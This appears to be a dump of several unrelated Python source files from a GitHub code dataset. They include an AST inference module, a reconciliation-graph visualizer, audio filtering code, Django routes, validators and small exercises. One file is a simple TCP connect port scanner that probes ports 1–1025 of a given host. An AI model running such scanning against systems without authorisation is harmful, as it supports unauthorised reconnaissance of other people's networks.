a list or a tuple, recurse on it to\n get values infered by its content\n \"\"\"\n if isinstance(stmt, (List, Tuple)):\n # XXX loosing context\n return chain(*map(unpack_infer, stmt.nodes))\n infered = next(stmt.infer(context))\n if infered is stmt:\n return iter( (stmt,) )\n return chain(*map(unpack_infer, stmt.infer(context)))\n\ndef copy_context(context):\n if context is not None:\n return context.clone()\n else:\n return InferenceContext()\n \ndef _infer_stmts(stmts, context, frame=None):\n \"\"\"return an iterator on statements infered by each statement in \n \"\"\"\n stmt = None\n infered = False\n if context is not None:\n name = context.lookupname\n context = context.clone()\n else:\n name = None\n context = InferenceContext()\n for stmt in stmts:\n if stmt is YES:\n yield stmt\n infered = True\n continue\n context.lookupname = stmt._infer_name(frame, name)\n try:\n for infered in stmt.infer(context):\n yield infered\n infered = True\n except UnresolvableName:\n continue\n except InferenceError:\n yield YES\n infered = True\n if not infered:\n raise InferenceError(str(stmt))\n\n# special inference objects ###################################################\n\nclass Yes(object):\n \"\"\"a yes object\"\"\"\n def __repr__(self):\n return 'YES'\n def __getattribute__(self, name):\n return self\n def __call__(self, *args, **kwargs):\n return self\nYES = Yes()\n\nclass Proxy(object):\n \"\"\"a simple proxy object\"\"\"\n def __init__(self, proxied):\n self._proxied = proxied\n\n def __getattr__(self, name):\n return getattr(self._proxied, name)\n\n def infer(self, context=None):\n yield self\n\n\nclass InstanceMethod(Proxy):\n \"\"\"a special node representing a function bound to an instance\"\"\"\n def __repr__(self):\n instance = self._proxied.parent.frame()\n return 'Bound method %s of %s.%s' % (self._proxied.name,\n instance.root().name,\n instance.name)\n __str__ = __repr__\n\n def is_bound(self):\n return True\n\n\nclass Instance(Proxy):\n \"\"\"a special node representing a class instance\"\"\"\n def getattr(self, name, context=None, lookupclass=True):\n try:\n return self._proxied.instance_attr(name, context)\n except NotFoundError:\n if name == '__class__':\n return [self._proxied]\n if name == '__name__':\n # access to __name__ gives undefined member on class\n # instances but not on class objects\n raise NotFoundError(name)\n if lookupclass:\n return self._proxied.getattr(name, context)\n raise NotFoundError(name)\n\n def igetattr(self, name, context=None):\n \"\"\"infered getattr\"\"\"\n try:\n # XXX frame should be self._proxied, or not ?\n return _infer_stmts(\n self._wrap_attr(self.getattr(name, context, lookupclass=False)),\n context, frame=self)\n except NotFoundError:\n try:\n # fallback to class'igetattr since it has some logic to handle\n # descriptors\n return self._wrap_attr(self._proxied.igetattr(name, context))\n except NotFoundError:\n raise InferenceError(name)\n \n def _wrap_attr(self, attrs):\n \"\"\"wrap bound methods of attrs in a InstanceMethod proxies\"\"\"\n # Guess which attrs are used in inference.\n def wrap(attr):\n if isinstance(attr, Function) and attr.type == 'method':\n return InstanceMethod(attr)\n else:\n return attr\n return map(wrap, attrs)\n \n def infer_call_result(self, caller, context=None):\n \"\"\"infer what's a class instance is returning when called\"\"\"\n infered = False\n for node in self._proxied.igetattr('__call__', context):\n for res in node.infer_call_result(caller, context):\n infered = True\n yield res\n if not infered:\n 
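# '__call__' resolved on the class, but no call result could be infered\n            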
raise InferenceError()\n\n def __repr__(self):\n return 'Instance of %s.%s' % (self._proxied.root().name,\n self._proxied.name)\n __str__ = __repr__\n \n def callable(self):\n try:\n self._proxied.getattr('__call__')\n return True\n except NotFoundError:\n return False\n\n def pytype(self):\n return self._proxied.qname()\n \nclass Generator(Proxy): \n \"\"\"a special node representing a generator\"\"\"\n def callable(self):\n return True\n \n def pytype(self):\n return '__builtin__.generator'\n\n# imports #####################################################################\n\nfrom clonedigger.logilab.astng.manager import ASTNGManager, Project, Package\nMANAGER = ASTNGManager()\n\nfrom clonedigger.logilab.astng.nodes import *\nfrom clonedigger.logilab.astng import nodes\nfrom clonedigger.logilab.astng.scoped_nodes import *\nfrom clonedigger.logilab.astng import inference\nfrom clonedigger.logilab.astng import lookup\nlookup._decorate(nodes)\n\nList._proxied = MANAGER.astng_from_class(list)\nList.__bases__ += (inference.Instance,)\nList.pytype = lambda x: '__builtin__.list'\n\nTuple._proxied = MANAGER.astng_from_class(tuple)\nTuple.__bases__ += (inference.Instance,)\nTuple.pytype = lambda x: '__builtin__.tuple'\n\nDict.__bases__ += (inference.Instance,)\nDict._proxied = MANAGER.astng_from_class(dict)\nDict.pytype = lambda x: '__builtin__.dict'\n\nbuiltin_astng = Dict._proxied.root()\n\nConst.__bases__ += (inference.Instance,)\nConst._proxied = None\ndef Const___getattr__(self, name):\n if self.value is None:\n raise AttributeError(name)\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return getattr(self._proxied, name)\nConst.__getattr__ = Const___getattr__\ndef Const_getattr(self, name, context=None, lookupclass=None):\n if self.value is None:\n raise NotFoundError(name)\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return self._proxied.getattr(name, context)\nConst.getattr = Const_getattr\nConst.has_dynamic_getattr = lambda x: False\n\ndef Const_pytype(self):\n if self.value is None:\n return '__builtin__.NoneType'\n if self._proxied is None:\n self._proxied = MANAGER.astng_from_class(self.value.__class__)\n return self._proxied.qname()\nConst.pytype = Const_pytype\n","repo_name":"jlachowski/clonedigger","sub_path":"clonedigger/logilab/astng/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"10303495533","text":"'''\r\nFirst written by Dennis Wang,\r\nmodified by Santi Santichaivekin (Feb 28, 19).\r\n'''\r\n\r\nimport networkx as nx\r\n\r\nEXAMPLE1 = {\r\n ('p1', 'h1'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p2', 'h3'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p3', 'h2'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p4', 'h4'): [['C', (None, None), (None, None), 1.0], 0],\r\n ('p6', 'h7'): [['S', ('p7', 'h1'), ('p8', 'h2'), 0.5], 2],\r\n ('p6', 'h8'): [['S', ('p7', 'h3'), ('p8', 'h4'), 0.5], 2],\r\n ('p7', 'h1'): [['T', ('p1', 'h1'), ('p2', 'h3'), 0.5], 1],\r\n ('p7', 'h3'): [['T', ('p2', 'h3'), ('p1', 'h1'), 0.5], 1],\r\n ('p8', 'h2'): [['T', ('p3', 'h2'), ('p4', 'h4'), 0.5], 1],\r\n ('p8', 'h4'): [['T', ('p4', 'h4'), ('p3', 'h2'), 0.5], 1]\r\n}\r\n\r\nEXAMPLE2 = {\r\n ('p1', 'h1'): [('C', (None, None), (None, None))],\r\n ('p2', 'h3'): [('C', (None, None), (None, None))],\r\n ('p3', 'h2'): [('C', (None, None), (None, 
None))],\r\n ('p4', 'h4'): [('C', (None, None), (None, None))],\r\n ('p6', 'h7'): [('S', ('p7', 'h1'), ('p8', 'h2'))],\r\n ('p6', 'h8'): [('S', ('p7', 'h3'), ('p8', 'h4'))],\r\n ('p7', 'h1'): [('T', ('p1', 'h1'), ('p2', 'h3'))],\r\n ('p7', 'h3'): [('T', ('p2', 'h3'), ('p1', 'h1'))],\r\n ('p8', 'h2'): [('T', ('p3', 'h2'), ('p4', 'h4'))],\r\n ('p8', 'h4'): [('T', ('p4', 'h4'), ('p3', 'h2'))]\r\n}\r\n\r\ndef eventNodeType(eventNode):\r\n '''\r\n Returns 'S', 'T', 'D', L', or 'C'\r\n 'S': speciation\r\n 'D': duplication\r\n 'T': transfer\r\n 'L': loss\r\n 'C': end event\r\n '''\r\n return eventNode[0]\r\n\r\ndef mappingNodeToStr(mappingNode):\r\n return \"{}-{}\".format(mappingNode[0], mappingNode[1])\r\n\r\ndef firstChild(eventNode):\r\n # ['T', ('p3', 'h2'), ('p4', 'h4'), 0.5]\r\n # returns a mapping node\r\n assert(eventNode[1][0] and eventNode[1][1])\r\n return eventNode[1]\r\n\r\ndef secondChild(eventNode):\r\n # ['T', ('p3', 'h2'), ('p4', 'h4'), 0.5]\r\n # ['C', (None, None), (None, None), 1.0]\r\n # returns a mapping node\r\n # do not use on null entities\r\n assert(eventNode[2][0] and eventNode[2][1])\r\n return eventNode[2]\r\n\r\ndef eventNodeToStr(eventNode):\r\n # ('S', ('p7', 'h1'), ('p8', 'h2'), 0.5], 2)\r\n # ('S', ('n32', 'm143'), ('n31', 'm144'))\r\n if eventNodeType(eventNode) == 'S':\r\n return \"spec | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'T':\r\n return \"tran | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'D':\r\n return \"dupl | {}-{}, {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n eventNode[2][0], eventNode[2][1]\r\n )\r\n elif eventNodeType(eventNode) == 'L':\r\n return \"loss | {}-{}\".format(\r\n eventNode[1][0], eventNode[1][1],\r\n )\r\n if eventNodeType(eventNode) == 'C':\r\n return \"END\"\r\n\r\ndef edgesFromReconciliationGraph(dtlGraph):\r\n outputEdgesList = []\r\n for mappingNode, eventNodes in dtlGraph.items():\r\n mappingNodeName = mappingNodeToStr(mappingNode)\r\n for eventNode in eventNodes :\r\n # check whether this is an event node or just\r\n # extra data -- SEE EXAMPLE1\r\n try:\r\n assert eventNode[0] in ['S', 'T', 'D', 'L', 'C']\r\n except:\r\n continue\r\n\r\n eventNodeName = eventNodeToStr(eventNode)\r\n # we do not have to insert the end event to\r\n # the visualization\r\n if eventNodeType(eventNode) == 'C':\r\n pass\r\n # loss has only one children\r\n elif eventNodeType(eventNode) == 'L':\r\n outputEdgesList.append((mappingNodeName, eventNodeName))\r\n\r\n nextMappingNodeName = mappingNodeToStr(firstChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName))\r\n # other types have two children\r\n else:\r\n outputEdgesList.append((mappingNodeName, eventNodeName))\r\n \r\n nextMappingNodeName0 = mappingNodeToStr(firstChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName0))\r\n nextMappingNodeName1 = mappingNodeToStr(secondChild(eventNode))\r\n outputEdgesList.append((eventNodeName, nextMappingNodeName1))\r\n\r\n return outputEdgesList\r\n\r\ndef visualizeAndSave(dtlGraph, targetFile):\r\n '''\r\n Receives that graph part of the reconciliation graph.\r\n Visualizes it and saves it to targetfile.\r\n\r\n Note: targetfile must ends with .png\r\n '''\r\n assert(targetFile.endswith(\".png\"))\r\n # creates an empty graph\r\n nxDtlGraph = nx.DiGraph()\r\n # add edges -- note that the library 
already prefers to place\r\n    # topologically lower nodes on the top\r\n    nxDtlGraph.add_edges_from(edgesFromReconciliationGraph(dtlGraph))\r\n    pydotDtlGraph = nx.drawing.nx_pydot.to_pydot(nxDtlGraph)\r\n    pydotDtlGraph.write_png(targetFile)\r\n\r\nif __name__ == '__main__' :\r\n    visualizeAndSave(EXAMPLE1, \"example1.png\")\r\n    visualizeAndSave(EXAMPLE2, \"example2.png\")","repo_name":"ssantichaivekin/hmc-reconciliation-graph","sub_path":"ReconciliationVisualization.py","file_name":"ReconciliationVisualization.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26562934351","text":"import socket\r\nimport datetime\r\n\r\ntext_file = open(\"Ced's Port Scanner.txt\", \"w\")\r\ntext_file.write(\"Welcome to the scan \\n\\n\")\r\n\r\nserver = input(\"enter target to scan: \")\r\nip = socket.gethostbyname(server)\r\n\r\nprint(server)\r\nprint(ip)\r\n\r\nt1 = datetime.datetime.now()\r\ntext_file.write(\"Current datetime :\" + str(t1) + \"\\n\\n\")\r\n\r\n\r\ndef scan(targetip):\r\n    for x in range(1, 1026):\r\n\r\n        s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)\r\n        s.settimeout(.25)\r\n        a = s.connect_ex((targetip, x))\r\n        print(a)\r\n        if a == 0:\r\n            print(\"Port \" + str(x) + \" is open!!!!!!!\")\r\n            text_file.write(\"Port {} is open \\n\\n\".format(x))\r\n\r\n        else:\r\n            print(\"Port \" + str(x) + \" isn't available\")\r\n        s.close()\r\n\r\n\r\nscan(ip)\r\n\r\nt2 = datetime.datetime.now()\r\n\r\ntext_file.write(\"Ending datetime :\" + str(t2) + \"\\n\\n\")\r\nprint(\"Ending datetime :\" + str(t2) + \"\\n\\n\")\r\ntotal = t2 - t1\r\n\r\nprint(\"Scan completed in: \", total)\r\ntext_file.write(\"Scan completed in: \" + str(total))\r\ntext_file.close()\r\n","repo_name":"cnorfleet97/python-port-scanner-","sub_path":"cedrics_port_scanner.py","file_name":"cedrics_port_scanner.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22394806187","text":"# coding:utf-8\n\nimport json\nimport codecs\nimport urllib\n# html outputer: writes the valuable crawled data to files\n\nclass HtmlOutputer(object):\n\n    def __init__(self):\n        self.datas = []\n\n    # collect data into the list; every element is one json record\n    def collect_data(self, data):\n        if data is None:\n            return\n        self.datas.append(data)\n\n    # print the json data\n    def output_json_info(self,data):\n        json_str = json.dumps(data,ensure_ascii=False,indent=4)\n        print(json_str)\n\n    # write the data to a json file\n    def output_json(self):\n        with codecs.open(\"out.json\",\"w\",'utf-8') as f:\n\n            json.dump(self.datas,f,ensure_ascii=False,indent=4)\n            print(\"finished writing the file...\")\n\n    # write the data to an html file\n    def output_html(self):\n\n        fout = open('output.html','w')\n\n        fout.write('<html>')\n        fout.write(\"<body>\")\n        fout.write(\"<table>\")\n\n        for data in self.datas:\n            fout.write(\"<tr>\")\n            fout.write(\"<td>%s</td>\" % data['url'])\n            fout.write(\"<td>%s</td>\" % data['title'].encode('utf-8'))\n            fout.write(\"<td>%s</td>\" % data['summary'].encode('utf-8'))\n            fout.write(\"</tr>\")\n\n        fout.write(\"</table>\")\n        fout.write(\"</body>\")\n        fout.write(\"</html>\")\n\n        fout.close()\n","repo_name":"fuyi501/pySpiders","sub_path":"baiduBaike/html_outputer.py","file_name":"html_outputer.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"20137390402","text":"from typing import List\n\n\nclass Solution:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        \"\"\"\n        Idea:\n        This is actually a stacked 1D sorted array:\n        binary search it, but map the 1D pointers to rows and cols\n        \"\"\"\n        rows, cols = len(matrix), len(matrix[0])\n        left, right = 0, rows * cols - 1\n        while left <= right:\n            mid = (left + right) // 2\n            r, c = mid // cols, mid % cols\n            if matrix[r][c] == target:\n                return True\n            elif matrix[r][c] > target:\n                right = mid - 1\n            else:\n                left = mid + 1\n\n        return False\n\n\nif __name__ == '__main__':\n    matrix = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]]\n    target = 5\n    sol = Solution()\n    print(sol.searchMatrix(matrix, target))\n","repo_name":"Rocky-Zhenxiang-Fang/LeetCode","sub_path":"74. Search a 2D Matrix.py","file_name":"74. Search a 2D Matrix.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2279282156","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date    : 2020-03-21 16:17:17\n# @Author  : mutudeh (josephmathone@gmail.com)\n# @Link    : ${link}\n# @Version : $Id$\n\n\nclass Solution(object):\n    def getKth(self, lo, hi, k):\n        weights = []\n        for i in range(lo,hi+1):\n            weights.append([self.get_weight(i),i])\n        weights = sorted(weights,key = lambda x:(x[0],x[1]))\n        print(weights)\n        return weights[k-1][1]\n\n    def get_weight(self,num):\n        steps = 0\n        while num != 1:\n            if num & 1 == 1:\n                # the number is odd\n                num = 3*num + 1\n            else:\n                num //= 2\n            steps += 1\n        return steps\n\ns = Solution()\nprint(s.getKth(7,11,4))\n","repo_name":"joseph-mutu/Codes-of-Algorithms-and-Data-Structure","sub_path":"Leetcode/5350. 将整数按权重排序.py","file_name":"5350. 
将整数按权重排序.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73923574970","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 10 15:12:54 2019\r\n\r\n@authors: Katarzyna Lenard - 2218524L & Mustafa Biyikli - 2190523B\r\n\"\"\"\r\n\r\nimport scipy.io.wavfile as wavfile\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nFs, x_t = wavfile.read(\"original.wav\") # Load the audio sample\r\nx_t = x_t[:, 1] / 2**15 # Reduce to single-channel and normalise the signal (16-bit recording)\r\nx_t = x_t[50000 : len(x_t)-35000] # Remove muted sections [beginning & end]\r\nresolution = Fs/len(x_t)\r\nmargin = -75 # Margin line on amplitude[dB]/frequency[Hz] graph\r\ny = np.linspace(margin, margin, len(x_t)) # This is to plot the margin line later on\r\nfigManager = plt.get_current_fig_manager()\r\nfigManager.resize(*figManager.window.maxsize())\t # Load the plots in a maximised window (changed for Linux)\r\nSM58_mimic = [] # This is used to plot the enhancer frequency response by appending ramp values to it\r\n\r\n# Plot the audio signal against time, add title and name x & y axes\r\ntime = np.linspace(0, len(x_t)/Fs, num=len(x_t)) # Create an array of time[s] using number of samples\r\nplt.subplot(321, facecolor=\"white\") and plt.plot(time, x_t, \"black\", linewidth=0.5)\r\nplt.title(\"Original Audio Signal [Time Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude\") and plt.xlabel(\"Time [s]\")\r\nplt.xlim(0, len(x_t)/Fs) and plt.ylim(-0.5, 0.5)\r\nplt.grid()\r\n\r\n# Plot the audio signal against frequency, add title and name x & y axes\r\nx_f = np.fft.fft(x_t) # Forward FT: Time Domain -> Frequency Domain; Make data sample size independent\r\nx_f_plot = 20*np.log10(np.fft.fft(x_t)/len(x_t)) # Discrete FT for the plot\r\nx_f_dB = 20*np.log10(x_f) # Convert to dB\r\nfrequency = np.linspace(0, Fs, len(x_t)) # Create an array of frequency[Hz] using Nyquist Theorem of Fmax <= Fs/2\r\nplt.subplot(322, facecolor=\"white\") and plt.plot(frequency, np.real(x_f_plot), \"black\", linewidth=0.5)\r\nplt.xscale(\"log\")\r\nplt.title(\"Original Audio Signal [Frequency Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.ylim(-200, -40)\r\nplt.xlim(1, Fs/2) # Exclude the mirrored part from the log scale start is 1 as 10**0 = 1\r\nplt.grid()\r\nplt.plot(frequency, y, \"k--\", linewidth=0.5) # This is the margin line\r\n\r\n#Apply a High Pass Filter (50Hz)\r\nh1 = int(len(x_f_dB)/Fs*0)\r\nh2 = int(len(x_f_dB)/Fs*50)\r\nx_f_dB[h1 : h2+1] = 0\r\nx_f_dB[len(x_f_dB)-h2 : len(x_f_dB)-h1+1] = 0\r\n\r\n# Apply a Low Pass Filter (15kHz)\r\nl1 = int(len(x_f_dB)/Fs*1.5e4)\r\nl2 = int(len(x_f_dB)/Fs*Fs/2)\r\nx_f_dB[l1 : l2+1] = 0\r\nx_f_dB[len(x_f_dB)-l2 : len(x_f_dB)-l1+1] = 0\r\n\r\n# 50Hz to 100Hz Region, SHURE SM-58 frequency response manipulation (Remove +8dB from 50Hz and 0dB from 100: linear correlation)\r\nfor harmonics in np.arange(50, 1e2, resolution):\r\n ramp = harmonics*8/50 - 16 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n\r\n# Leave 100Hz to 1kHz region untouched\r\nfor harmonics in np.arange(1e2, 1e3, resolution):\r\n ramp = 0 \r\n # Uncomment the following if fundemetal region is to be modified; change ramp value as desired\r\n '''\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n 
x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n '''\r\n SM58_mimic.append(ramp)\r\n\r\n# 1kHz to 5.5kHz Region, SHURE SM-58 frequency response manipulation (Add 0dB to 1kHz and +5dB to 5.5kHz: linear correlation)\r\nfor harmonics in np.arange(1e3, 5.5e3, resolution):\r\n ramp = harmonics/900 - 10/9 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 5.5kHz to 6kHz Region, SHURE SM-58 frequency response manipulation (Add +5dB from 5kHz to 6kHz: linear correlation)\r\nfor harmonics in np.arange(5.5e3, 6e3, resolution):\r\n ramp = 5 \r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 6kHz to 8kHz Region, SHURE SM-58 frequency response manipulation (Add +5dB to 6kHz and +1dB to 8kHz: linear correlation)\r\nfor harmonics in np.arange(6e3, 8e3, resolution):\r\n ramp = 2.4e4*4/harmonics - 11\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n \r\n# 8kHz to 10kHz Region, SHURE SM-58 frequency response manipulation (Add +1dB to 8kHz and +4dB to 10kHz: linear correlation)\r\nfor harmonics in np.arange(8e3, 1e4, resolution):\r\n ramp = harmonics*3/2000 - 11\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp)\r\n\r\n# 10kHz to 15kHz Region, SHURE SM-58 frequency response manipulation (Add +4dB to 10kHz and remove +7dB from 15kHz: linear correlation)\r\nfor harmonics in np.arange(1e4, 1.5e4, resolution):\r\n ramp = 1.5e4*11/harmonics*2 - 29\r\n k1 = int(len(x_f)/Fs*(harmonics))\r\n x_f_dB[k1] = x_f_dB[k1] + ramp\r\n x_f_dB[len(x_f_dB)-k1] = x_f_dB[len(x_f_dB)-k1] + ramp\r\n SM58_mimic.append(ramp) \r\n\r\n# Plot the improved audio signal against frequency, add title and name x & y axes\r\nx_f_plot = 10**(x_f_dB/20)\r\nplt.subplot(324, facecolor=\"white\") and plt.plot(frequency, np.real(20*np.log10(x_f_plot/len(x_t))), \"black\", linewidth=0.5)\r\nplt.xscale(\"log\")\r\nplt.title(\"Improved Audio Signal [Frequency Domain]\", loc=\"center\")\r\nplt.ylabel(\"Amplitude [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.ylim(-200, -40)\r\nplt.xlim(1, Fs/2) # Remove the mirrored part from the log scale start is 1 as 10**0 = 1\r\nplt.grid()\r\nplt.plot(frequency, y, \"--k\", linewidth=0.5)\r\n\r\n# Transform the improved audio back to time domain\r\nsound_clean = np.fft.ifft((10**(x_f_dB/20))*(2**15)) # Convert back to x[t]\r\nsound_clean = np.real(sound_clean)\r\nsound_clean = np.asarray(sound_clean, dtype=np.int16)\r\n\r\n# Plot the improved audio signal against time, add title and name x & y axes\r\nplt.subplot(323, facecolor=\"white\") and plt.plot(time, sound_clean/2**15, \"black\", linewidth=0.5)\r\nplt.title(\"Improved Auido Signal [Time Domain]\")\r\nplt.ylabel(\"Amplitude\") and plt.xlabel(\"Time [s]\")\r\nplt.xlim(0, len(x_t)/Fs) and plt.ylim(-0.5, 0.5)\r\nplt.grid()\r\n\r\n# Not necessary, plotted just to justify \r\nplt.subplot(325)\r\nplt.specgram(x_t, Fs=Fs)\r\nplt.title(\"Original Audio Spectrogram\")\r\nplt.ylabel(\"Frequency [Hz]\") and plt.xlabel(\"Time [s]\")\r\n\r\n# Plot the enhancer frequency response which shows how the signal is manipulated\r\nplt.subplot(326, facecolor=\"white\") and plt.plot(np.linspace(50, 15000, 
num=len(SM58_mimic)), SM58_mimic, \"black\", linewidth=2)\r\nplt.xscale(\"log\")\r\nplt.title(\"Enhancer Frequency Response\")\r\nplt.ylabel(\"Manipulation [dB]\") and plt.xlabel(\"Frequency [Hz]\")\r\nplt.xlim(10**0, Fs/2)\r\nxmajor_ticks = [20, 50, 100, 1000, 10000]\r\nymajor_ticks = np.arange(-10, 11, 5)\r\nplt.xticks(xmajor_ticks, xmajor_ticks)\r\nplt.yticks(ymajor_ticks, ymajor_ticks)\r\nplt.tick_params(axis='both', which='major')\r\nplt.grid(which='both', alpha=1)\r\n\r\n# Titles and axes labels overlap, this solves them; could also use plt.tight_layout()\r\nplt.subplots_adjust(wspace=0.25, hspace=0.6)\r\nplt.show()\r\n\r\nwavfile.write(\"improved.wav\", Fs, sound_clean) # Save the improved audio in the same directory\r\n","repo_name":"MustafaBiyikli/harmonic-enhancer","sub_path":"harmonic_enhancer.py","file_name":"harmonic_enhancer.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"18889270883","text":"from django.urls import path\nfrom sign import views_api, views_api_sec\n\nurlpatterns = [\n    # sign system interface:\n    # ex : /api/add_event/\n    path('add_event/', views_api.add_event, name='add_event'),\n    # ex : /api/add_guest/\n    path('add_guest/', views_api.add_guest, name='add_guest'),\n    # ex : /api/get_event_list/\n    path('get_event_list/', views_api.get_event_list, name='get_event_list'),\n    # ex : /api/get_guest_list/\n    path('get_guest_list/', views_api.get_guest_list, name='get_guest_list'),\n    # ex : /api/guest_sign/\n    path('guest_sign/', views_api.guest_sign, name='guest_sign'),\n\n    # security interface:\n    # ex : /api/sec_get_event_list/\n    path('sec_get_event_list/', views_api_sec.sec_get_event_list, name='sec_get_event_list'),\n    # ex : /api/sec_add_event/\n    path('sec_add_event/', views_api_sec.sec_add_event, name='sec_add_event'),\n    # ex : /api/sec_get_guest_list/\n    path('sec_get_guest_list/', views_api_sec.sec_get_guest_list, name='sec_get_guest_list'),\n]\napp_name = 'sign'\n","repo_name":"shelly1205/pythonTest","sub_path":"guest/sign/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12667308951","text":"import re\nimport datetime\n\n\ndef is_zero(val, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val == 0\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_int(val, min_value=None, max_value=None, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\tres = True\n\t\tif not(min_value is None):\n\t\t\tres = res and val >= min_value\n\t\tif not (max_value is None):\n\t\t\tres = res and val <= max_value\n\t\treturn res\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_year(val, min_year=1000, max_year=9999, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val in range(min_year, min(datetime.date.today().year + 100, max_year + 1))\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_month(val, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val in range(1, 13)\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_valid_string(val, nosql=True, max_length=5000, strip=True):\n\tif not (val is None or len(val.strip()) == 0):\n\t\tval = val.strip() if strip else val\n\t\tis_length_fit = len(val) in range(1, max_length + 1 if max_length != -1 else len(val) + 1)\n\t\tif nosql:\n\t\t\treturn is_length_fit and re.match(r'(\\s|\\S)*select\\s+(\\s|\\S)*[a-z]+(\\s|\\S)*\\s+from\\s+(\\s|\\S)*[a-z]+(\\s|\\S)*', val, re.IGNORECASE) is None\n\t\treturn is_length_fit\n\treturn False\n","repo_name":"SimonXwk/onepic","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28170039754","text":"from clonalg import CloneAlg\nfrom jmetal.operator import BinaryTournamentSelection, PolynomialMutation, SBXCrossover, UniformMutation\nfrom jmetal.problem.singleobjective.unconstrained import Rastrigin\nfrom jmetal.util.termination_criterion import StoppingByEvaluations\nfrom jmetal.core.observer import Observer\nfrom jmetal.operator.selection import RouletteWheelSelection, BestSolutionSelection\nfrom jmetal.core.problem import FloatProblem, FloatSolution\nimport matplotlib.pyplot as plt\nfrom jmetal.core.operator import Crossover\nimport scikit_posthocs as sp\nfrom scipy import stats\nimport numpy as np\nimport math\nimport random, copy\nfrom typing import List\nimport seaborn as sns\nsns.set()\n\n\nclass Ackle(FloatProblem):\n    def __init__(self, number_of_variables: int = 10):\n        super().__init__()\n        self.number_of_objectives = 1\n        self.number_of_variables = number_of_variables\n        self.number_of_constraints = 0\n\n        self.obj_directions = [self.MINIMIZE]\n        self.obj_labels = ['f(x)']\n\n        self.lower_bound = [-32.768 for _ in range(number_of_variables)]\n        self.upper_bound = [32.768 for _ in range(number_of_variables)]\n\n        FloatSolution.lower_bound = self.lower_bound\n        FloatSolution.upper_bound = self.upper_bound\n\n    def evaluate(self, solution: 